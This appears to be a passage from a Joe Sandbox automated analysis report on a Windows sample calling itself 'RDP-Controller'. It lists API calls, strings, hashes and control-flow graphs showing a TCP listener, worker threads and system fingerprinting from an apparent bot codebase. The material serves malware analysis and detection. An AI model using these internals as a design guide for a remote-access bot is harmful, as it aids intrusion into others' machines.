                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$bindfflushfwritehtonlhtonslistensetsockoptsocket
                                    • String ID: [E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$tcp_listen
                                    • API String ID: 3590747132-3524496754
                                    • Opcode ID: 1e281d2b764eda443bfba74c065725a3021d88745858eb50cd21d1acb4268d8f
                                    • Instruction ID: ea52b06ad4462447cf42324add4dd5ef2cd59e263cb2911047243c37c747cd06
                                    • Opcode Fuzzy Hash: 1e281d2b764eda443bfba74c065725a3021d88745858eb50cd21d1acb4268d8f
                                    • Instruction Fuzzy Hash: 2D31C3A0A1868681EA229B35EC0027C3691BF677B4F0C4776D87E273F9EE3DE4048740
                                    APIs
                                    • strcmp.MSVCRT ref: 00007FF7AABD1DD4
                                    • strcmp.MSVCRT ref: 00007FF7AABD1DE7
                                    • StartServiceCtrlDispatcherA.ADVAPI32 ref: 00007FF7AABD1E23
                                    • _read.MSVCRT ref: 00007FF7AABD1E79
                                    • GetLastError.KERNEL32 ref: 00007FF7AABD1E98
                                      • Part of subcall function 00007FF7AABD1A63: FreeLibrary.KERNEL32(?,?,00000000,0000027B435613D0,00007FF7AABD1E50,?,?,?,?,?,?,00000001,00007FF7AABD1FC3,?,?,00007FF7AABE8508), ref: 00007FF7AABD1AA1
                                      • Part of subcall function 00007FF7AABD1A63: GetProcessHeap.KERNEL32(?,?,00000000,0000027B435613D0,00007FF7AABD1E50,?,?,?,?,?,?,00000001,00007FF7AABD1FC3,?,?,00007FF7AABE8508), ref: 00007FF7AABD1AD4
                                      • Part of subcall function 00007FF7AABD1A63: HeapFree.KERNEL32(?,?,00000000,0000027B435613D0,00007FF7AABD1E50,?,?,?,?,?,?,00000001,00007FF7AABD1FC3,?,?,00007FF7AABE8508), ref: 00007FF7AABD1AE5
                                      • Part of subcall function 00007FF7AABD1B1C: GetProcessHeap.KERNEL32(?,?,00000000,00007FF7AABD1E55,?,?,?,?,?,?,00000001,00007FF7AABD1FC3,?,?,00007FF7AABE8508,00000000), ref: 00007FF7AABD1B4D
                                      • Part of subcall function 00007FF7AABD1B1C: HeapFree.KERNEL32(?,?,00000000,00007FF7AABD1E55,?,?,?,?,?,?,00000001,00007FF7AABD1FC3,?,?,00007FF7AABE8508,00000000), ref: 00007FF7AABD1B5E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: Heap$Free$Processstrcmp$CtrlDispatcherErrorLastLibraryServiceStart_read
                                    • String ID: RDP-Controller$[E] (%s) -> No a valid run mode(mode=%s)$[E] (%s) -> StartServiceCtrlDispatcherA failed(GetLastError=%lu)$main$service$standalone
                                    • API String ID: 3617873859-308889057
                                    • Opcode ID: c6fdafb6e61b9dcc75db4515785ec9ddd183118bff9fd0d5da33b544536fa653
                                    • Instruction ID: 1a82f67c2631f1c1b7d68c82cab88009924ece0eea4062e52add690203f01454
                                    • Opcode Fuzzy Hash: c6fdafb6e61b9dcc75db4515785ec9ddd183118bff9fd0d5da33b544536fa653
                                    • Instruction Fuzzy Hash: B151E714E0F643CAFBB07754B490378A295AF18344FD605B2D94E462B2DF5DE9879332
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
                                    • String ID:
                                    • API String ID: 3714283218-0
                                    • Opcode ID: a8064edad5975ffa8ddaf6c1b07911e7f079fd9c5a4557f8d4210bda645fea64
                                    • Instruction ID: b5bfd98776a629aacf83aad9fb312f072a560f5a0313ef7423434fbd47439650
                                    • Opcode Fuzzy Hash: a8064edad5975ffa8ddaf6c1b07911e7f079fd9c5a4557f8d4210bda645fea64
                                    • Instruction Fuzzy Hash: 00516D25E0BA46C9FB61FB51E850279A3A4BF58B94F8684B5CD0D473B2DF3DE4428360
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastrecv
                                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                    • API String ID: 2514157807-65069805
                                    • Opcode ID: d743631cf24eda1d2df6e3a0731321b0b9a64b83d7173c1e462706517f616e59
                                    • Instruction ID: 443ea5245f852919e507c84450c86e15306b7b62a44d2ce79e19c172b9af7c58
                                    • Opcode Fuzzy Hash: d743631cf24eda1d2df6e3a0731321b0b9a64b83d7173c1e462706517f616e59
                                    • Instruction Fuzzy Hash: E11136E0A0C59791FA2A5B35EC506B81250BF177A4E501331E92DEA6F6DEDCAE5A8300

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 7ff7aabd4fc5-7ff7aabd4fe1 1 7ff7aabd5077-7ff7aabd50a5 call 7ff7aabd2ef2 0->1 2 7ff7aabd4fe7-7ff7aabd4fea 0->2 13 7ff7aabd5529-7ff7aabd553a 1->13 4 7ff7aabd4ff0-7ff7aabd4ff4 2->4 5 7ff7aabd50aa-7ff7aabd50d8 call 7ff7aabd2ef2 2->5 8 7ff7aabd4ff6-7ff7aabd4ffa 4->8 9 7ff7aabd5000-7ff7aabd5015 fopen 4->9 5->13 8->9 10 7ff7aabd50dd-7ff7aabd510b call 7ff7aabd2ef2 8->10 11 7ff7aabd5110-7ff7aabd5139 _errno call 7ff7aabd2ef2 _errno 9->11 12 7ff7aabd501b-7ff7aabd5030 fseek 9->12 10->13 27 7ff7aabd517f-7ff7aabd5193 _errno 11->27 28 7ff7aabd513b-7ff7aabd5148 11->28 16 7ff7aabd51e3-7ff7aabd51f0 call 7ff7aabde438 12->16 17 7ff7aabd5036-7ff7aabd505f _errno call 7ff7aabd2ef2 _errno 12->17 18 7ff7aabd5543-7ff7aabd5550 13->18 19 7ff7aabd553c 13->19 36 7ff7aabd51f2 16->36 37 7ff7aabd521b-7ff7aabd5244 _errno call 7ff7aabd2ef2 _errno 16->37 33 7ff7aabd5065-7ff7aabd5072 17->33 34 7ff7aabd51ca-7ff7aabd51de _errno 17->34 24 7ff7aabd5552-7ff7aabd5563 call 7ff7aabd2ef2 18->24 25 7ff7aabd5589-7ff7aabd5590 18->25 19->18 32 7ff7aabd5568-7ff7aabd557a 24->32 25->24 35 7ff7aabd5518-7ff7aabd551b 27->35 28->27 33->1 34->35 38 7ff7aabd5525-7ff7aabd5527 35->38 39 7ff7aabd551d-7ff7aabd5520 fclose 35->39 40 7ff7aabd5513 36->40 41 7ff7aabd51f8-7ff7aabd51fd 36->41 47 7ff7aabd5246-7ff7aabd5253 37->47 48 7ff7aabd528a-7ff7aabd529e _errno 37->48 38->13 44 7ff7aabd5592-7ff7aabd55ab call 7ff7aabd2ef2 38->44 39->38 40->35 45 7ff7aabd52a3-7ff7aabd52bb fseek 41->45 46 7ff7aabd5203-7ff7aabd5208 41->46 44->32 50 7ff7aabd5331-7ff7aabd535a _errno call 7ff7aabd2ef2 _errno 45->50 51 7ff7aabd52bd-7ff7aabd52c9 45->51 46->45 52 7ff7aabd520e-7ff7aabd5216 46->52 47->48 48->35 61 7ff7aabd53a0-7ff7aabd53b4 _errno 50->61 62 7ff7aabd535c-7ff7aabd5369 50->62 54 7ff7aabd52cf-7ff7aabd52d5 51->54 55 7ff7aabd53b9-7ff7aabd53db GetProcessHeap HeapAlloc 51->55 52->35 58 7ff7aabd5582-7ff7aabd5587 54->58 59 7ff7aabd52db 54->59 55->54 57 7ff7aabd53e1-7ff7aabd53f7 call 7ff7aabd2ef2 55->57 57->54 58->35 64 7ff7aabd52e0-7ff7aabd52ef 59->64 61->35 62->61 66 7ff7aabd52f5-7ff7aabd52f7 64->66 67 7ff7aabd548e-7ff7aabd5497 64->67 66->67 68 7ff7aabd52fd-7ff7aabd5320 fread 66->68 69 7ff7aabd54bf-7ff7aabd54e2 call 7ff7aabd2ef2 67->69 70 7ff7aabd5499-7ff7aabd549b 67->70 68->67 72 7ff7aabd5326 68->72 74 7ff7aabd549d-7ff7aabd54a2 69->74 73 7ff7aabd54e4-7ff7aabd54e9 70->73 70->74 79 7ff7aabd53fc-7ff7aabd5425 _errno call 7ff7aabd2ef2 _errno 72->79 80 7ff7aabd532c-7ff7aabd532f 72->80 77 7ff7aabd54f3-7ff7aabd54fc 73->77 78 7ff7aabd54eb-7ff7aabd54f1 73->78 74->35 75 7ff7aabd54a4-7ff7aabd54bd GetProcessHeap HeapFree 74->75 75->35 77->78 78->35 83 7ff7aabd546b-7ff7aabd547f _errno 79->83 84 7ff7aabd5427-7ff7aabd5434 79->84 80->64 83->64 84->83
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: _errno$fclosefflushfopenfseekfwrite
                                    • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                                    • API String ID: 2897271634-4120527733
                                    • Opcode ID: 2086d0b3fccbe90f8278429222fdf507b6fcba6ad0b34e4d164f706ff4c95eaf
                                    • Instruction ID: 4acbaace41dbcb4fa812371cbaededd15540e1bc3228b7d5d025c6d37d39a747
                                    • Opcode Fuzzy Hash: 2086d0b3fccbe90f8278429222fdf507b6fcba6ad0b34e4d164f706ff4c95eaf
                                    • Instruction Fuzzy Hash: 75D19E71A0BA03C2FA21FB54E8403B8A755BF60795FD646BAD90D472B0DE3CE5878320

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 85 7ffb23ab3aa7-7ffb23ab3aca InitializeCriticalSectionAndSpinCount 86 7ffb23ab3c52-7ffb23ab3c73 GetLastError call 7ffb23ab2072 85->86 87 7ffb23ab3ad0-7ffb23ab3af7 InitializeCriticalSectionAndSpinCount 85->87 99 7ffb23ab3c75 86->99 100 7ffb23ab3c8d-7ffb23ab3c93 86->100 88 7ffb23ab3afd-7ffb23ab3b0d 87->88 89 7ffb23ab3d6e-7ffb23ab3d8f GetLastError call 7ffb23ab2072 87->89 92 7ffb23ab3b13-7ffb23ab3b4b CreateThread 88->92 93 7ffb23ab4140-7ffb23ab4158 call 7ffb23ab2072 88->93 103 7ffb23ab3da9-7ffb23ab3daf 89->103 104 7ffb23ab3d91 89->104 97 7ffb23ab3e46-7ffb23ab3e67 GetLastError call 7ffb23ab2072 92->97 98 7ffb23ab3b51-7ffb23ab3b6d call 7ffb23ab2072 92->98 106 7ffb23ab415d-7ffb23ab4164 93->106 121 7ffb23ab3e69 97->121 122 7ffb23ab3e7d-7ffb23ab3e83 97->122 98->93 127 7ffb23ab3b73-7ffb23ab3bab CreateThread 98->127 108 7ffb23ab3d1e 99->108 109 7ffb23ab3c7b-7ffb23ab3c88 99->109 101 7ffb23ab3c99-7ffb23ab3c9f 100->101 102 7ffb23ab3d32 100->102 110 7ffb23ab3ccb-7ffb23ab3cce 101->110 111 7ffb23ab3ca1-7ffb23ab3ca7 101->111 120 7ffb23ab3d3c 102->120 115 7ffb23ab4165-7ffb23ab416a 103->115 116 7ffb23ab3db5-7ffb23ab3dbb 103->116 112 7ffb23ab3d97-7ffb23ab3da4 104->112 113 7ffb23ab413b 104->113 108->102 109->100 125 7ffb23ab3ce4-7ffb23ab3cea 110->125 126 7ffb23ab3cd0-7ffb23ab3cd3 110->126 118 7ffb23ab3d5a 111->118 119 7ffb23ab3cad-7ffb23ab3cb3 111->119 112->103 113->93 115->93 123 7ffb23ab3de7-7ffb23ab3dea 116->123 124 7ffb23ab3dbd-7ffb23ab3dc3 116->124 130 7ffb23ab3d64 118->130 119->130 131 7ffb23ab3cb9-7ffb23ab3cbf 119->131 146 7ffb23ab3d46 120->146 132 7ffb23ab3e6b-7ffb23ab3e78 121->132 133 7ffb23ab3e9f-7ffb23ab3eaf 121->133 136 7ffb23ab3e85 122->136 137 7ffb23ab3ee0-7ffb23ab3ef0 122->137 139 7ffb23ab3e08-7ffb23ab3e0e 123->139 140 7ffb23ab3dec-7ffb23ab3def 123->140 134 7ffb23ab3dc9-7ffb23ab3dcf 124->134 135 7ffb23ab4181-7ffb23ab4186 124->135 141 7ffb23ab3cec 125->141 142 7ffb23ab3d50 125->142 126->120 138 7ffb23ab3cd5-7ffb23ab3cd8 126->138 128 7ffb23ab3f4e-7ffb23ab3f6f GetLastError call 7ffb23ab2072 127->128 129 7ffb23ab3bb1-7ffb23ab3bcd call 7ffb23ab2072 127->129 172 7ffb23ab3f85-7ffb23ab3f8b 128->172 173 7ffb23ab3f71 128->173 129->93 167 7ffb23ab3bd3-7ffb23ab3c0b CreateThread 129->167 130->89 149 7ffb23ab3cf6 131->149 150 7ffb23ab3cc1 131->150 132->122 133->93 152 7ffb23ab3dd5-7ffb23ab3ddb 134->152 153 7ffb23ab4188-7ffb23ab418d 134->153 135->93 147 7ffb23ab3eb4-7ffb23ab3eb7 136->147 148 7ffb23ab3e87-7ffb23ab3e8d 136->148 137->93 138->146 154 7ffb23ab3cda 138->154 143 7ffb23ab3e14-7ffb23ab3e19 139->143 144 7ffb23ab417a-7ffb23ab417f 139->144 155 7ffb23ab3df5-7ffb23ab3df8 140->155 156 7ffb23ab416c-7ffb23ab4171 140->156 141->149 142->118 143->93 144->93 146->142 160 7ffb23ab3eb9-7ffb23ab3ebc 147->160 161 7ffb23ab3ed8-7ffb23ab3ede 147->161 158 7ffb23ab3ec3-7ffb23ab3ed3 148->158 159 7ffb23ab3e8f-7ffb23ab3e95 148->159 149->108 150->110 163 7ffb23ab3ddd-7ffb23ab3de2 152->163 164 7ffb23ab3e1e-7ffb23ab3e23 152->164 153->93 154->125 165 7ffb23ab4173-7ffb23ab4178 155->165 166 7ffb23ab3dfe-7ffb23ab3e03 155->166 156->93 158->93 168 7ffb23ab3ef5-7ffb23ab3f05 159->168 169 7ffb23ab3e97-7ffb23ab3e9d 159->169 170 7ffb23ab3f0a-7ffb23ab3f1a 160->170 171 7ffb23ab3ebe-7ffb23ab3ec1 160->171 161->133 161->137 163->93 164->93 165->93 166->93 174 7ffb23ab404c-7ffb23ab406d GetLastError call 7ffb23ab2072 167->174 175 7ffb23ab3c11-7ffb23ab3c2d call 7ffb23ab2072 167->175 168->93 169->133 169->137 170->93 171->133 171->158 178 7ffb23ab3fe8-7ffb23ab3ff8 172->178 179 7ffb23ab3f8d 172->179 176 7ffb23ab3f73-7ffb23ab3f80 173->176 177 7ffb23ab3fa7-7ffb23ab3fb7 173->177 195 7ffb23ab4083-7ffb23ab4089 174->195 196 7ffb23ab406f 174->196 175->93 194 7ffb23ab3c33-7ffb23ab3c48 call 7ffb23ab2072 175->194 176->172 177->93 178->93 182 7ffb23ab3fbc-7ffb23ab3fbf 179->182 183 7ffb23ab3f8f-7ffb23ab3f95 179->183 184 7ffb23ab3fc1-7ffb23ab3fc4 182->184 185 7ffb23ab3fe0-7ffb23ab3fe6 182->185 188 7ffb23ab3f97-7ffb23ab3f9d 183->188 189 7ffb23ab3fcb-7ffb23ab3fdb 183->189 192 7ffb23ab3fc6-7ffb23ab3fc9 184->192 193 7ffb23ab4012-7ffb23ab4022 184->193 185->177 185->178 190 7ffb23ab3ffd-7ffb23ab400d 188->190 191 7ffb23ab3f9f-7ffb23ab3fa5 188->191 189->93 190->93 191->177 191->178 192->177 192->189 193->93 202 7ffb23ab3c4d 194->202 200 7ffb23ab40b9-7ffb23ab40c9 195->200 201 7ffb23ab408b 195->201 198 7ffb23ab40e3-7ffb23ab40f3 196->198 199 7ffb23ab4071-7ffb23ab407e 196->199 198->93 199->195 200->93 203 7ffb23ab408d-7ffb23ab4090 201->203 204 7ffb23ab40cb-7ffb23ab40d1 201->204 202->106 205 7ffb23ab40b1-7ffb23ab40b7 203->205 206 7ffb23ab4092-7ffb23ab4095 203->206 207 7ffb23ab40d3-7ffb23ab40d9 204->207 208 7ffb23ab409c-7ffb23ab40ac 204->208 205->198 205->200 209 7ffb23ab4107-7ffb23ab4117 206->209 210 7ffb23ab4097-7ffb23ab409a 206->210 211 7ffb23ab40f5-7ffb23ab4105 207->211 212 7ffb23ab40db-7ffb23ab40e1 207->212 208->93 209->93 210->198 210->208 211->93 212->198 212->200
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$CriticalSection$CreateThread$CountInitializeSpin$CopyEnterFileLeavefflushfwrite
                                    • String ID: $ $ $ $ $Done$P$P$P$P$P$[E] (%s) -> CreateThread(routine_accept) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_gc) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_tx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_clients) failed(gle=%lu)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_queue) failed(gle=%lu)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$routine_accept$routine_gc$routine_tx$server_init$~$~$~$~$~
                                    • API String ID: 3214881788-719614687
                                    • Opcode ID: dac36e3bd0cdf9df57b4b9ad19cad6874c2198d7d1dc801a52f0c0ee30f6488d
                                    • Instruction ID: d55cd1e62e0fa8e0353f31389e1f8702566d0255ed4d69138a54ae9834ca278f
                                    • Opcode Fuzzy Hash: dac36e3bd0cdf9df57b4b9ad19cad6874c2198d7d1dc801a52f0c0ee30f6488d
                                    • Instruction Fuzzy Hash: ADF1FAA0E0C78381FB625735EC8437D1256AF37365F2C07B6C52E262E9DE6EA9858341

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 213 7ffb23ab482c-7ffb23ab4846 call 7ffb23ab5154 216 7ffb23ab4d68 213->216 217 7ffb23ab484c-7ffb23ab4861 call 7ffb23ab50d3 213->217 220 7ffb23ab4d7c-7ffb23ab4d81 216->220 221 7ffb23ab4863-7ffb23ab4891 217->221 222 7ffb23ab48b7 217->222 223 7ffb23ab48c9-7ffb23ab48e0 call 7ffb23ab2072 220->223 231 7ffb23ab4893-7ffb23ab4898 221->231 232 7ffb23ab489a-7ffb23ab48b5 call 7ffb23ab2072 221->232 225 7ffb23ab48bc-7ffb23ab48c7 FreeLibrary 222->225 226 7ffb23ab48e5-7ffb23ab48f2 223->226 225->223 228 7ffb23ab48f3-7ffb23ab492c GetNativeSystemInfo GetWindowsDirectoryA 225->228 229 7ffb23ab4932-7ffb23ab4953 GetLastError call 7ffb23ab2072 228->229 230 7ffb23ab4a10-7ffb23ab4a33 call 7ffb23ab2072 228->230 239 7ffb23ab4955 229->239 240 7ffb23ab4973-7ffb23ab4979 229->240 230->223 241 7ffb23ab4a39-7ffb23ab4a6f call 7ffb23ab9ad2 230->241 231->225 232->225 242 7ffb23ab4969-7ffb23ab496e 239->242 243 7ffb23ab4957-7ffb23ab4964 239->243 240->220 244 7ffb23ab497f-7ffb23ab4985 240->244 253 7ffb23ab4a75-7ffb23ab4a77 241->253 254 7ffb23ab4b20-7ffb23ab4b3c call 7ffb23ab2072 241->254 242->223 243->242 246 7ffb23ab4987-7ffb23ab498a 244->246 247 7ffb23ab49be-7ffb23ab49c4 244->247 251 7ffb23ab49a8-7ffb23ab49ae 246->251 252 7ffb23ab498c-7ffb23ab498f 246->252 249 7ffb23ab4da4-7ffb23ab4da9 247->249 250 7ffb23ab49ca-7ffb23ab49d0 247->250 249->223 257 7ffb23ab49d6-7ffb23ab49dc 250->257 258 7ffb23ab4dae-7ffb23ab4db3 250->258 255 7ffb23ab49b4-7ffb23ab49b9 251->255 256 7ffb23ab4d9a-7ffb23ab4d9f 251->256 260 7ffb23ab4995-7ffb23ab4998 252->260 261 7ffb23ab4d86-7ffb23ab4d8b 252->261 253->223 262 7ffb23ab4a7d-7ffb23ab4ada GetVolumeInformationA 253->262 265 7ffb23ab4b41 254->265 255->223 256->223 263 7ffb23ab49e8-7ffb23ab49ed 257->263 264 7ffb23ab49de-7ffb23ab49e3 257->264 258->223 266 7ffb23ab499e-7ffb23ab49a3 260->266 267 7ffb23ab4d90-7ffb23ab4d95 260->267 261->223 268 7ffb23ab4bd7-7ffb23ab4c09 call 7ffb23ab2072 262->268 269 7ffb23ab4ae0-7ffb23ab4b06 GetLastError call 7ffb23ab2072 262->269 263->223 264->223 265->253 266->223 267->223 276 7ffb23ab4c1d-7ffb23ab4c24 268->276 277 7ffb23ab4c0b-7ffb23ab4c17 strlen 268->277 274 7ffb23ab4b46-7ffb23ab4b4c 269->274 275 7ffb23ab4b08 269->275 281 7ffb23ab4ca3-7ffb23ab4ca8 274->281 282 7ffb23ab4b52 274->282 278 7ffb23ab4b0e-7ffb23ab4b1b 275->278 279 7ffb23ab4c8f-7ffb23ab4c94 275->279 283 7ffb23ab4c28-7ffb23ab4c85 call 7ffb23ab2072 276->283 277->276 280 7ffb23ab4ce9-7ffb23ab4ced 277->280 278->254 279->223 280->276 284 7ffb23ab4cf3-7ffb23ab4cf7 280->284 281->223 285 7ffb23ab4b54-7ffb23ab4b57 282->285 286 7ffb23ab4b8b-7ffb23ab4b91 282->286 293 7ffb23ab4c8a 283->293 284->276 290 7ffb23ab4cfd-7ffb23ab4d30 _errno strtol _errno 284->290 291 7ffb23ab4b75-7ffb23ab4b7b 285->291 292 7ffb23ab4b59-7ffb23ab4b5c 285->292 288 7ffb23ab4b97-7ffb23ab4b9d 286->288 289 7ffb23ab4ccb-7ffb23ab4cd0 286->289 294 7ffb23ab4cd5-7ffb23ab4cda 288->294 295 7ffb23ab4ba3-7ffb23ab4ba9 288->295 289->223 296 7ffb23ab4d32-7ffb23ab4d35 290->296 297 7ffb23ab4d40-7ffb23ab4d63 _errno call 7ffb23ab2072 290->297 300 7ffb23ab4cc1-7ffb23ab4cc6 291->300 301 7ffb23ab4b81-7ffb23ab4b86 291->301 298 7ffb23ab4cad-7ffb23ab4cb2 292->298 299 7ffb23ab4b62-7ffb23ab4b65 292->299 293->226 294->223 302 7ffb23ab4cdf-7ffb23ab4ce4 295->302 303 7ffb23ab4baf-7ffb23ab4bb4 295->303 296->283 304 7ffb23ab4d3b 296->304 297->276 298->223 306 7ffb23ab4cb7-7ffb23ab4cbc 299->306 307 7ffb23ab4b6b-7ffb23ab4b70 299->307 300->223 301->223 302->223 303->223 304->276 306->223 307->223
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
